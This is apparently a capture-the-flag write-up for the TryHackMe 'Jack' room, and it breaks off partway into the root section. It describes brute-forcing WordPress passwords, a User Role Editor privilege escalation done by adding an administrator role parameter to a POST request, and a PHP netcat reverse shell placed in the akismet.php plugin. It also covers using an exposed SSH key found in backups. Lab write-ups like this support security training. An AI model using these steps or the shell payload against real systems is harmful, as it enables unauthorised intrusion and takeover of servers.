Jack

https://tryhackme.com/room/jack

Add jack.thm to /etc/hosts

User flag

Let's start with a nmap scan

We see there's only two open ports. Let's head to port 80 to see if we find something interesting.

Let's check robots.txt

Nothing really interesting at first look. Let's fire up wpscan.

In my experiencie most of Wordpress boxes is about brute forcing, so let's try to get those user passwords. After a while trying to brute force the login with the rockyou.txt wordlist we saw it was taking a lot of time so we tried the fasttrack one.

Nice. We got one. Let's log in.

We can't get a rev shell with a non privileged user so we must do something to get that admin account. After taking a look at the HINT we see there's a vulnerability involving the User Role Editor plugin.

We can use metasploit or we can do it manual. We've chosen manual: https://vk9-sec.com/wordpress-plugin-user-role-editor-4-24-privilege-escalation/

Let's fire up Burp Suit and click on "Update Profile".

We need to add: "&ure_other_role=administrator" at the end on the post request.

If we forward all the requests we can see we now have admin privileges.

This way we can get a reverse shell the usual way.

Plugins > Plugin Editor > akismet.php. Let's add:

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip address> <port> >/tmp/f") ?>

We have to activate the plugin.

Noice. We got in. Now we have to upgrade the shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg

Root flag

If we read the "reminder.txt" we can guess something happened with the backups. So let's head to /var/backups

We see there's a juicy id_rsa file. Let's copy the content and ssh into the machine with Jack using the key.

Before using Linpeas or any other automated enumeration tool let's take a look around the system. We see something interesting in the /opt/statuscheck folder.